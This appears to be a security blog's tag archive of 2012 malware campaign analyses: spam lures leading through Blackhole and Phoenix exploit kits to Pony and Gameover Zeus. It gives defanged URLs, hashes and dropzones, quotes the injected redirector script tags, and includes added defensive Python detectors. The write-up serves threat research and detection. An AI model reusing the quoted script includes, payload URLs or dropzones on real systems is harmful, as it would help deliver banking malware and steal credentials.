Tag Archives: Zeus

Twitter received a request to reset the password for your account.

We analyzed the following malicious URL, which was used in Twitter-themed spam on May 17, 2012:

hxxp://lakshmiparthasarathyathreya.com/nwFzPsjZ/index.html

Twitter - Reset Password

This malicious page contained four JavaScript includes, as shown below:

<script type="text/javascript" src="hxxp://www.houard.eu/D2ec6Q6S/js.js"></script>
<script type="text/javascript" src="hxxp://egerak.ipislam.edu.my/vp0BYhy2/js.js"></script>
<script type="text/javascript" src="hxxp://hardinggraphics.com/ZRRV8K9w/js.js"></script>
<script type="text/javascript" src="hxxp://portaldomarmoreegranito.com.br/69zecvvX/js.js"></script>

These malicious scripts eventually redirect the victim to a Blackhole Exploit Kit at hxxp://69.194.192.218/showthread.php?t=d7ad916d1c0396ff

The Blackhole kit first drops Pony from the following location:

hxxp://69.194.192.218/q.php?f=ba33e&e=4
File: readme.exe
MD5: cc696f9ac857c59be3940791f1dfa9c1
Size: 99,808 bytes

The Pony downloader posts to its dropzone at hxxp://50.57.121.196/pony/gate.php. It was also configured to download two identical Gameover Zeus payloads from the following locations:

1. hxxp://hosting1554269.az.pl/j5EGyoC.exe
2. hxxp://spiritfinancial.net/JqLBEaNt.exe

Gameover installs itself in %APPDATA%\Micyu\viunbu.exe

MD5: 1a518087bc0cbc1efd869012b2b1a7bd
Size: 305,120 bytes
Timestamp: 2010:10:29 20:57:49+02:00
Signature: This file is digitally signed by ‘gHA6’
Certificate Validity: 05/16/2012 to 01/01/2040

This Gameover Zeus variant posts to a dropzone at 189.78.66.155:29620. Webinjects were downloaded from 87.23.103.64:19802. The Gameover variant had a botid of "NRm18".
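The chain above (Blackhole landing page, Pony downloader fetched from the kit, Pony posting to its gate) turns directly into proxy-log detection logic. The following Python is an added example, not code from the original post: the stage patterns come from the URL shapes quoted above (showthread.php?t=<16 hex>, q.php?f=<hex>&e=<n>, /pony/gate.php), while the log format, the client addresses in the sample log and the two-stage threshold are constructed assumptions for this example.

```python
"""Added example (not from the original post): match proxy-log lines against
the Blackhole -> Pony -> Gameover delivery chain described above."""
import re
from urllib.parse import urlparse

# Stage patterns derived from the URL shapes quoted in the post.
# Each entry is (stage name, regex applied to the request path+query).
STAGE_PATTERNS = [
    ("blackhole-landing", re.compile(r"/showthread\.php\?t=[0-9a-f]{16}$")),
    ("blackhole-payload", re.compile(r"/q\.php\?f=[0-9a-f]+&e=\d+$")),
    ("pony-gate",         re.compile(r"/pony/gate\.php$")),
]


def refang(url):
    """Turn the post's defanged 'hxxp://' notation back into a real scheme."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def classify_url(url):
    """Return the delivery-chain stage a URL belongs to, or None."""
    parsed = urlparse(refang(url))
    path_and_query = parsed.path + ("?" + parsed.query if parsed.query else "")
    for stage, pattern in STAGE_PATTERNS:
        if pattern.search(path_and_query):
            return stage
    return None


# Constructed proxy log (client, method, URL, status); addresses are
# documentation ranges, the paths are the ones quoted in the post.
SAMPLE_LOG = """\
10.0.0.5 GET http://example.invalid/index.html 200
10.0.0.5 GET http://198.51.100.7/showthread.php?t=d7ad916d1c0396ff 200
10.0.0.5 GET http://198.51.100.7/q.php?f=ba33e&e=4 200
10.0.0.5 POST http://203.0.113.9/pony/gate.php 200
10.0.0.8 GET http://example.invalid/about.html 200
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3})$")


def scan_log(text):
    """Return (client, stage, url) for every log line that hits a stage."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the scan
        client, _method, url, _status = m.groups()
        stage = classify_url(url)
        if stage:
            hits.append((client, stage, url))
    return hits


def infected_clients(hits, min_stages=2):
    """Clients that touched at least `min_stages` distinct chain stages.
    Requiring more than one stage cuts noise from a single odd URL."""
    seen = {}
    for client, stage, _url in hits:
        seen.setdefault(client, set()).add(stage)
    return sorted(c for c, stages in seen.items() if len(stages) >= min_stages)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print("likely infected:", infected_clients(found))
```

On the constructed log, only 10.0.0.5 hits all three stages; a client that merely requested a single `/q.php` URL would not be reported under the default threshold.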

As we have been seeing for the past few weeks, the Pony Downloader and Gameover Zeus payloads share the same file properties, indicating that both were built by the same group, possibly at around the same time:

Signature: This file is digitally signed by ‘gHA6’
Certificate Validity: 05/16/2012 to 01/01/2040
Company Name: bhq93888888888 Corporation
File Description: CTF Loader
Internal Name: CTFMON
Legal Copyright: © bhq93888888888 Corporation. All rights reserved.
Original Filename: CTFMON.EXE
Product Name: bhq93888888888® Windows® Operating System
Product Version: 6.1.7600.16385
Ole Self Register: D
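The shared properties above are a useful triage pivot: the binaries claim to be Windows components, yet the signer is a random string and the certificate runs to 2040. The following Python is an added example, not code from the original post. It parses a Key: Value block like the one above and flags those mismatches; the thresholds (a ten-year certificate span, the shape of a random signer name, and the small set of impersonated system-binary names) are assumptions chosen for this example.

```python
"""Added example (not from the original post): triage heuristics over the
PE version-info and signature properties listed in the post."""
import re
from datetime import datetime

# Property block as printed in the post (Pony/Gameover shared properties).
SAMPLE_PROPS = """\
Signature: This file is digitally signed by 'gHA6'
Certificate Validity: 05/16/2012 to 01/01/2040
Company Name: bhq93888888888 Corporation
File Description: CTF Loader
Internal Name: CTFMON
Legal Copyright: © bhq93888888888 Corporation. All rights reserved.
Original Filename: CTFMON.EXE
Product Name: bhq93888888888® Windows® Operating System
Product Version: 6.1.7600.16385
"""

# Assumed list: genuine Windows binary names the samples on the page impersonate.
KNOWN_SYSTEM_BINARIES = {"CTFMON.EXE", "DFDWIZ.EXE"}

# Accepts straight or curly quotes around the signer name.
SIGNER_RE = re.compile(r"signed by\s+['\u2018\u2019]?([^'\u2018\u2019]+)['\u2018\u2019]?",
                       re.IGNORECASE)


def parse_properties(block):
    """Parse 'Key: Value' lines into a dict; lines without a colon are ignored."""
    props = {}
    for line in block.strip().splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            props[key.strip()] = value.strip()
    return props


def signer_name(props):
    """Extract the signer from the 'Signature' line, or '' if absent."""
    m = SIGNER_RE.search(props.get("Signature", ""))
    return m.group(1).strip() if m else ""


def signer_looks_random(signer):
    """Heuristic (assumption): a single alphanumeric token mixing case and
    digits, with no spaces, is not how a CA names a real vendor."""
    return (bool(re.fullmatch(r"[A-Za-z0-9]{4,}", signer))
            and any(c.isdigit() for c in signer)
            and any(c.isupper() for c in signer)
            and any(c.islower() for c in signer))


def validity_years(validity):
    """'MM/DD/YYYY to MM/DD/YYYY' -> certificate lifetime in years."""
    start, end = [datetime.strptime(s.strip(), "%m/%d/%Y") for s in validity.split(" to ")]
    return (end - start).days / 365.25


def triage(props, max_cert_years=10):
    """Return a list of human-readable reasons the metadata looks forged."""
    reasons = []
    signer = signer_name(props)
    if signer and signer_looks_random(signer):
        reasons.append("random-looking signer name %r" % signer)
    validity = props.get("Certificate Validity")
    if validity and validity_years(validity) > max_cert_years:
        reasons.append("certificate valid for %.1f years" % validity_years(validity))
    company = props.get("Company Name", "")
    product = props.get("Product Name", "")
    if "Windows" in product and "Operating System" in product and "Microsoft" not in company:
        reasons.append("Windows OS product name but company is %r" % company)
    original = props.get("Original Filename", "").upper()
    if original in KNOWN_SYSTEM_BINARIES and "Microsoft" not in signer:
        reasons.append("%s is a Windows system binary name but signer is not Microsoft" % original)
    return reasons


if __name__ == "__main__":
    for reason in triage(parse_properties(SAMPLE_PROPS)):
        print("-", reason)
```

The later samples on this page, which copy Microsoft's own company and product strings, would still be caught by the signer-name and certificate-lifetime checks alone, which is why the heuristics are kept independent rather than combined into one rule.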


Zeus v2.0.8.9 being rolled out on IRS themed spam

We analyzed the following malicious attachment, which was distributed with IRS-themed spam on May 14, 2012:

Name: Plexer_Order-z9284
MD5: e807511362923762da627599daeeba65
Size: 2,154,749 bytes
Content: Plexer_Order-z9284.exe

This zip archive contained the following malicious dropper:

Name: Plexer_Order-z9284.exe
MD5: 3c8b1a1c45fbb93e93dbde75795c21bd
Size: 2,184,348 bytes
Timestamp: 1970:01:01 01:00:49+01:00
Company Name: NEW ORDER 2012 FOR VIEW PLEXR
File Description: Win32 Cabinet Self-Extractor
File Version: 9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
Internal Name: Wextract
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: WEXTRACT.EXE .MUI
Product Name: Plexer Order Viewer 2012
Product Version: 56.0.89.3
Comments: NEW VERSION ORDER 2012 FOR VIEW PLEXR
Website: http://www.avira.com
Packager: Xenocode Postbuild 2009 for .NET Beta
Packager Version: 7.0.162

This dropper first installs Google Talk on the system and brings the Google Talk window to the front of the desktop. Behind the scenes, it installs Zeus v2.0.8.9. Zeus was installed in %APPDATA%/[random]/emta.exe and had the following file properties:

Name: emta.exe
MD5: bbdeabff13e565e187e0e85fcb1e732f
Size: 95,744 bytes
Timestamp: 2011:07:27 04:06:30+02:00

Like a standard Zeus build, it first downloads a configuration file consisting of the target list and webinjects from:

hxxp://kmginsights.com/upload/LoadhandlerImages_/y/config.bin

The Zeus dropzone was also running on the same domain at:

hxxp://kmginsights.com/upload/LoadhandlerImages_/y/gate.php

This Zeus controller was running on the compromised website of KMG INSIGHTS, which offers a complete line of marketing, technology and organizational consulting services.

Russian, Spanish, Italian and UK banks and financial institutions were targeted by this Zeus controller.

ACH Transfer Rejected

We analyzed the following malicious URL, which was used in ACH-themed spam on April 25, 2012:

hxxp://ft000267.ferozo.com/HbusWmxz/index.html

ACH Transfer rejected

This malicious page contained four JavaScript includes, as shown below:

<script type="text/javascript" src="hxxp://crowclub.ca/nRDnUrDq/js.js"></script>
<script type="text/javascript" src="hxxp://zadar.hr/aAyhw3ey/js.js"></script>
<script type="text/javascript" src="hxxp://giupban24h.com/v3NcYEV4/js.js"></script>
<script type="text/javascript" src="hxxp://pacilg.org/RaQhf32L/js.js"></script>

These malicious scripts eventually redirect the victim to a Blackhole Exploit Kit at hxxp://216.119.142.235/showthread.php?t=34c79594e8b8ac0f

The Blackhole kit first drops Pony from the following location:

hxxp://216.119.142.235/q.php?f=2fcad&e=2
File: contacts.exe
MD5: 242e28a23fbea9dc1e1939eea326a0d2
Size: 110,176 bytes

The Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download two identical Gameover Zeus payloads from the following locations:

1. hxxp://power-tec.sk/D8aoPu86/XPVqAGE.exe
2. hxxp://valuemerge.com/aXS0mRNT/KXj.exe

Gameover was installed in %APPDATA%\Ucnye\azufyv.exe

MD5: 647c62cd30f6fb4ea00e8829359b0a82
Size: 274,016 bytes
Timestamp: 2010:11:03 14:49:13+01:00
Signature: This file is digitally signed by 'tNzquyHloA4n3FFctsvudWw7x'
Certificate Validity: 04/24/2012 to 01/01/2040

This Gameover Zeus variant posts to a dropzone at 89.44.245.126:17711. Webinjects were downloaded from 64.60.155.138:21835. The Gameover variant had a botid of "mf222a25" and a cid of "3005".

Fwd: Scan from a Hewlett-Packard ScanJet #468974

We analyzed the following malicious URLs, which were used in HP scan-themed spam:

hxxp://eksitonas.lt/KzHz5BzZ/index.html
hxxp://casagustosa.gr/zo799HVs/index.html

These malicious pages contained three JavaScript includes, as shown below:

hxxp://yasonrafilm.com/ZAsUDjH1/js.js
hxxp://lsdkft.hu/bC1BxCbJ/js.js
hxxp://www.aafaq.ca/sxuvf5jV/js.js

These malicious scripts eventually redirect the victim to a Blackhole Exploit Kit at hxxp://208.117.43.8/showthread.php?t=34c79594e8b8ac0f

The Blackhole kit first drops Pony from the following location:

hxxp://208.117.43.8/q.php?f=2fcad&e=2
File: about.exe
MD5: 9b196853650fcb8ac182be05b627f07c
Size: 110,688 bytes

The Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download four identical Gameover Zeus payloads from the following locations:

1. hxxp://power-tec.sk/D8aoPu86/XPVqAGE.exe
2. hxxp://synergieassurance.com/AnJVfWxx/aFa.exe
3. hxxp://20272.w72.wedos.net/w7y74z3H/Hzt.exe
4. hxxp://electrosa.com/8zvW2XE.exe

Gameover was installed in %APPDATA%\Ociw\ilji.exe

MD5: 80bd579d484ac4742b75952fb1a2d694
Size: 274,016 bytes
Timestamp: 2010:11:03 04:51:09+01:00
Signature: This file is digitally signed by 'tNzquyHloA4n3FFctsvudWw7x'
Certificate Validity: 04/24/2012 to 01/01/2040

This Gameover Zeus variant posts to a dropzone at 86.35.218.231:17554. Webinjects were downloaded from 189.78.203.103:29161. The Gameover variant had a botid of "MF222a24" and a cid of "3005".

IRS spams

We analyzed the following malicious URLs, which we believe were used in IRS-themed spam:

hxxp://9x18.com/1FrYnHUV/index.html
hxxp://9x18.com/6GkXis2t/index.html
hxxp://9x18.com/7zSj5u8N/index.html
hxxp://9x18.com/9sfGpVaP/index.html
hxxp://9x18.com/DcXTY95c/index.html
hxxp://9x18.com/EdVTFHRy/index.html
hxxp://9x18.com/H37jjL6S/index.html
hxxp://9x18.com/JLdSGm4e/index.html
hxxp://9x18.com/KirxGAkT/index.html
hxxp://9x18.com/M7vrQsUT/index.html
hxxp://9x18.com/N7kkDdho/index.html
hxxp://9x18.com/U8nC5QAL/index.html
hxxp://9x18.com/Y1aFsgBk/index.html
hxxp://9x18.com/bFdJryZB/index.html
hxxp://9x18.com/igc6smeH/index.html
hxxp://9x18.com/jUyLton1/index.html
hxxp://9x18.com/pHbH0hzY/index.html
hxxp://9x18.com/rPWsV1Cp/index.html
hxxp://9x18.com/tjUQVqbC/index.html
hxxp://beinsync.in/1FrYnHUV/index.html
hxxp://9x18.com/wVKshGdP/index.html
hxxp://beinsync.in/6GkXis2t/index.html
hxxp://alcopaz.com/1FrYnHUV/index.html
hxxp://beinsync.in/7zSj5u8N/index.html
hxxp://alcopaz.com/6GkXis2t/index.html
hxxp://beinsync.in/9sfGpVaP/index.html

Although 9x18.com was restricting access to these URLs, the other malicious URLs were up and redirecting victims to the Blackhole Exploit Kit through the following three JavaScript includes:

<script type="text/javascript" src="hxxp://anydemo.in/ox8rWBHG/js.js"></script>
<script type="text/javascript" src="hxxp://Darsshan.com/8n9SXXoy/js.js"></script>
<script type="text/javascript" src="hxxp://www.moverpackermart.com/3F634op7/js.js"></script>

The Blackhole kit was running at hxxp://85.25.189.174/showthread.php?t=34c79594e8b8ac0f. It first drops the Pony downloader from the following location:

hxxp://85.25.189.174/q.php?f=2fcad&e=2
File: info.exe
MD5: 9b196853650fcb8ac182be05b627f07c
Size: 131,168 bytes

The Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download three identical Gameover Zeus payloads from the following locations:

1. hxxp://electrosa.com/8zvW2XE.exe
2. hxxp://arteyciencia.es/AUq5p7Sm/4VLks.exe
3. hxxp://hotelsatmatheran.com/0Pvo9Hnu/EpJbWNWD.exe
4. hxxp://poetesa.ro/0SbvQR5X/5op0.exe

Gameover was installed in %APPDATA%\Enze\izvuo.exe

MD5: 4105a615d658d89e836c125844be5f39
Size: 341,600 bytes
Timestamp: 2010:10:31 08:13:32+01:00
Payload Build Time: 2012-04-16 03:12:58

This Gameover Zeus variant posts to a dropzone at 86.124.117.250:16824. Webinjects were downloaded from 125.166.213.114:25137. The Gameover variant had a botid of "MF222a20" and a cid of "5555".

As we have been noting here, the Pony Downloader and Gameover Zeus payloads share the same properties, indicating that both were built by the same group, possibly at around the same time:

Signature: Digitally signed by ‘wU5sF34khy4k0DMt30RspNOOm’
Certificate Validity: 04/20/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

ACH Transaction Rejected

The samples we analyzed linked to malicious pages at hxxp://cayambeturismo.gob.ec/zHyxgRft/index.html and hxxp://doctors.eyes.org/a6qYbbvX/index.html

ACH transaction rejected

These malicious pages contained JavaScript that redirected victims to a Blackhole Exploit Kit at

hxxp://85.25.189.174/showthread.php?t=34c79594e8b8ac0f

The Blackhole kit first drops Pony from the following location:

hxxp://85.25.189.174/q.php?f=2fcad&e=2
File: about.exe
MD5: 9b196853650fcb8ac182be05b627f07c
Size: 131,168 bytes

The Pony downloader posts to its dropzone at 91.121.84.204/pony/gate.php. It was also configured to download three identical Gameover Zeus payloads from the following locations:

1. hxxp://electrosa.com/8zvW2XE.exe
2. hxxp://arteyciencia.es/AUq5p7Sm/4VLks.exe
3. hxxp://electrosa.com/8zvW2XE.exe
4. hxxp://poetesa.ro/0SbvQR5X/5op0.exe

Gameover was installed in %APPDATA%\Yblaa\duoju.exe

MD5: a898d910ac17e2dc00333a410daeaa68
Size: 347,744 bytes
Timestamp: 2010:10:28 19:52:20+02:00

This Gameover Zeus variant posts to a dropzone at 190.200.120.150:17663. Webinjects were downloaded from 210.4.72.124:13525. The Gameover variant had a botid of "mf222a20" and a cid of "5555".

Again, as noted over the past few days, the Pony Downloader and Gameover Zeus payloads shared the same properties:

Signature: Digitally signed by ‘wU5sF34khy4k0DMt30RspNOOm’
Certificate Validity: 04/20/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

Scan from a Xerox WorkCentre Pro #315614

The sample we analyzed had a link to a malicious page at hxxp://shopdreambags.com/FD6YBhNw/index.html

Scan from Xerox 315614

This malicious page contained JavaScript that redirected victims to a Blackhole Exploit Kit at

hxxp://184.22.115.24/showthread.php?t=34c79594e8b8ac0f

The Blackhole kit first drops Pony from the following location:

hxxp://184.22.115.24/q.php?f=2fcad&e=2
File: contacts.exe
MD5: ce1e4177bb2605a8637e386c6f7ab737
Size: 129,632 bytes

The Pony downloader posts to its dropzone at 200.72.183.54//pony/gate.php. It was also configured to download three identical Gameover Zeus payloads from the following locations:

1. hxxp://poetesa.ro/0SbvQR5X/5op0.exe
2. hxxp://arteyciencia.es/AUq5p7Sm/4VLks.exe
3. hxxp://redman.com.br/zqDQMaNF/SRivXt.exe

Gameover was installed in %APPDATA%\Jysah\gaihyl.exe

MD5: a898d910ac17e2dc00333a410daeaa68
Size: 347,744 bytes
Timestamp: 2010:10:31 04:27:18+01:00

This Gameover Zeus variant posts to a dropzone at 187.105.228.200:11752. Webinjects were downloaded from 71.80.237.121:14268. The Gameover variant had a botid of "MF222a19" and a cid of "5555".

Interestingly, the Pony Downloader and Gameover Zeus payloads shared the same properties, indicating that both were built by the same group, possibly at around the same time:

Signature: Digitally signed by ‘VfnHcYKXDLnVlQizT9uLI4yhP’
Certificate Validity: 04/18/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

VALERIO Pizza Order Confirmation

Order Confirmation

The sample we analyzed had a link to a malicious page at hxxp://printingcheaper.com/page1.htm?XVUU=S1KGEAGODJ8XNNAHB48IE5UHL&ZELSDVH=J0VL2BFPNUITV68G6&ID5TU3=UA0MLSUW5R2R8GC&DT9=MXK3SEKG0JMHDAU0RZAG6P3K&4S0W2E=8MG1P4S5IGNJAPNX87C&G4YO6P6=AEPEC1D5PXXZ&CS66A7F=RNK4RSELG796VIEX0TUYQ8F9&877R2=VGZBG625JCT8Z9O2K&KQA05=5L5TW1IP247&

This malicious page contained JavaScript that redirected victims to a Phoenix Exploit Kit at hxxp://uiwewsecondary.ru:8080/internet/fpkrerflfvd.php
The Phoenix kit first drops a CVE-2010-0188 PDF exploit from hxxp://uiwewsecondary.ru:8080/internet/kqbzaubpiqxnbn.pdf. The PDF file had the following properties:

File: kqbzaubpiqxnbn.pdf
MD5: 1b6f367a28de927e6573e803e555a297
Size: 13,163 bytes

A successful exploit in turn handed victims off to a second exploit kit at hxxp://poluicenotgo.ru:8080/internet/at.php?i=15. This kit dropped a Pony downloader with the following properties:

File: esfwatkocliuyn.exe
MD5: 5726463108bb6f26e6dd54763e85453b
Size: 135,264 bytes

Both of these Phoenix exploit kits are hosted at the following IP addresses, on the same fast-flux infrastructure:

83.170.91.152
85.214.204.32
88.190.22.72
89.31.145.154
112.78.124.115
125.19.103.198
41.168.5.140
62.85.27.129
173.203.211.157
210.56.23.100
211.44.250.173
216.24.197.66
219.94.194.138

The Pony downloader posts to its dropzone at hxxp://dare2dreamz.com/pony/gate.php, hosted at IP address 109.206.180.54. It was also configured to download three identical Gameover Zeus payloads from the following locations:

1. hxxp://dynolite.eu/7U0ASvP9/AZz.exe
2. hxxp://abbott.u4ria.co.za/HGFg1RHz/MkiZMX.exe
3. hxxp://demircioglubilgisayar.com.tr/qy3kMMxv/VgWqQm4k.exe

Gameover was installed in %APPDATA%\Meizo\ehgea.exe

MD5: a3e56f7ba6cd98b2ac87596daf74e2aa
Size: 371,808 bytes
Timestamp: 2010:10:29 14:08:06+02:00

This Gameover Zeus variant posts to a dropzone at 211.73.186.159:28813. Webinjects were downloaded from 76.73.52.11:25362. The Gameover variant had a botid of “MF222a17” and cid of “5555”.

Interestingly, the Pony Downloader and Gameover Zeus payloads shared the same properties, indicating that both were built by the same group, possibly at around the same time:

Signature: Digitally signed by ‘VfnHcYKXDLnVlQizT9uLI4yhP’
Certificate Validity: 04/16/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

NY TRAFFIC TICKET

Malicious URL:
hxxp://partyinthepark.co.za/page4.htm?563H0J=7J7WVK3SIM15NMTA5&SGLU=GPRI34KVG4J9QB&VNOP=DY7VUBIXD4WT&5LEPGN=4IWARW2MUHFT&

NY Traffic Ticket

The text "To Plead Click Here" in the spam carried a malicious hyperlink that eventually redirects the victim to a Phoenix Exploit Kit at hxxp://vitalitysomer.ru:8080/pages/glavctkoasjtct.php.

This Phoenix kit is hosted at the following IP addresses on a fast-flux infrastructure:

83.170.91.152
85.214.204.32
88.190.22.72
89.31.145.154
112.78.124.115
125.19.103.198
41.168.5.140
62.85.27.129
219.94.194.138
210.56.23.100
211.44.250.173
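The post ties the Phoenix kit at uiwewsecondary.ru (the pizza-order campaign above) and the one at vitalitysomer.ru to a single fast-flux infrastructure because their hosting IPs overlap. The following Python is an added example, not code from the original post, that makes that pivot repeatable: it clusters domains by the Jaccard overlap of their IP sets and reports the IPs common to a cluster. The two IP sets are the ones listed in the post; the unrelated.invalid entry and the 0.5 threshold are constructed for this example.

```python
"""Added example (not from the original post): cluster exploit-kit domains by
shared hosting IPs, the pivot the post uses to link the two Phoenix kits."""

# IP sets copied from the post; unrelated.invalid is a constructed negative control.
HOSTING = {
    "uiwewsecondary.ru": {
        "83.170.91.152", "85.214.204.32", "88.190.22.72", "89.31.145.154",
        "112.78.124.115", "125.19.103.198", "41.168.5.140", "62.85.27.129",
        "173.203.211.157", "210.56.23.100", "211.44.250.173", "216.24.197.66",
        "219.94.194.138",
    },
    "vitalitysomer.ru": {
        "83.170.91.152", "85.214.204.32", "88.190.22.72", "89.31.145.154",
        "112.78.124.115", "125.19.103.198", "41.168.5.140", "62.85.27.129",
        "219.94.194.138", "210.56.23.100", "211.44.250.173",
    },
    "unrelated.invalid": {"192.0.2.10", "192.0.2.11"},
}


def jaccard(a, b):
    """Overlap ratio of two IP sets: 0.0 (disjoint) to 1.0 (identical)."""
    if not a and not b:
        return 0.0
    return len(a & b) / len(a | b)


def cluster_by_overlap(hosting, threshold=0.5):
    """Group domains whose IP sets overlap with Jaccard >= threshold.
    Union-find over all domain pairs; returns a sorted list of sorted clusters."""
    parent = {d: d for d in hosting}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    domains = sorted(hosting)
    for i, d1 in enumerate(domains):
        for d2 in domains[i + 1:]:
            if jaccard(hosting[d1], hosting[d2]) >= threshold:
                parent[find(d1)] = find(d2)

    groups = {}
    for d in domains:
        groups.setdefault(find(d), []).append(d)
    return sorted(sorted(g) for g in groups.values())


def shared_ips(hosting, cluster):
    """IPs present on every domain of a cluster: the core of the infrastructure,
    and the part worth blocking regardless of which domain is in use today."""
    sets = [hosting[d] for d in cluster]
    return sorted(set.intersection(*sets)) if sets else []


if __name__ == "__main__":
    for cluster in cluster_by_overlap(HOSTING):
        print(cluster, "->", len(shared_ips(HOSTING, cluster)), "shared IPs")
```

With the post's data the two .ru kits share 11 of 13 addresses (Jaccard about 0.85) and land in one cluster, while the control domain stays on its own; a DNS-log feed that records resolved A records per domain can be fed into the same structure.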

The Phoenix controller drops a CVE-2010-0188 PDF exploit from hxxp://vitalitysomer.ru:8080/pages/jnapaqjrezbpj8.pdf. The PDF file had the following properties:

File: jnapaqjrezbpj8.pdf
MD5: 73a3d52244f68a2eb4254be2f9e9d740
Size: 13,151 bytes

A successful exploit drops a Pony downloader on the victim machine. The Pony downloader is fetched from another Phoenix exploit kit at hxxp://validatoronmee.ru:8080/pages/dq.php?i=15, which is hosted on the same fast-flux infrastructure as vitalitysomer.ru. The Pony downloader had the following properties:

File: duczdzd.exe
MD5: 392a574415aa24efbb1f7eda3564060d
Size: 140,840 bytes
Timestamp: 2012:04:13 23:48:26+02:00

The Pony downloader beacons to its dropzone at buyandsmile.atomclick.co/pony/gate.php. It was also configured to download three identical Gameover Zeus payloads from the following locations:

1. avrupamodaevi.com/Rp076wCE/JVB0dU2.exe
2. guidobruscia.it/aPRh4MrM/j0Bxm4C.exe
3. 20rueraspail.be/pBBJkPFK/PwpKbEJm.exe

Gameover installs itself in %APPDATA%\Wievo\myaxu.exe

MD5: 5210005536c9f3bbcda0149da4ff37c8
Size: 313,384 bytes
Timestamp: 2010:11:01 22:21:42+01:00

This Gameover Zeus variant posts to dropzones at 76.113.104.21:26928 and 178.235.0.255:16270. Webinjects were downloaded from 46.35.131.65:20177 and 116.203.3.213:28542. The Gameover variant had a BotID of "mf222a15" and a CID of "2222".

Interestingly, the Pony Downloader and Gameover Zeus payloads shared the same properties, indicating that both were built by the same group, at around the same time.

Signature: This file is digitally signed by ‘gvpQYV0qr00yndP’
Certificate Validity: 04/13/2012 to 01/01/2040
Company Name: Microsoft Corporation
File Description: Windows Disk Diagnostic User Resolver
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Internal Name: DFDWiz.exe
Legal Copyright: © Microsoft Corporation. All rights reserved.
Original Filename: DFDWiz.exe
Product Name: Microsoft® Windows® Operating System
Product Version: 6.1.7600.16385

Important Information About Your Account

The spammers sure are busy. Today, 2012-04-11, we observed a new spam template spoofing communications from BillMeLater.com – a PayPal service. The spam sample we analyzed had a subject line of “Important Information About Your Account”.

The observed sample contained a malicious link to pe04.com.br/gMsyk6kT/index.html. This page contained the following javascript redirector:

<script type="text/javascript" src="hxxp://axislegal.com.au/gcq37VtM/js.js"></script>

The above JavaScript redirected victims to a Blackhole Exploit Kit at hxxp://209.59.219.231/showthread.php?t=d7ad916d1c0396ff.

This kit dropped a number of different exploits, including the latest and greatest Java exploit, CVE-2012-0507. The malicious .jar file had the following properties:

File: Klot.jar
Size: 15,719 bytes
MD5: 26720F0252EB91BB7A326375313651F9

The kit also dropped a Gameover Zeus variant with the following properties:

Size: 301,096 bytes
MD5: 5CE366E6D7A949552AF10C4DEAF47506

The Gameover variant had a botid of NRa11. The criminals responsible for this campaign utilized a proxy at 200.58.99.114 to control victims infected with this Gameover variant.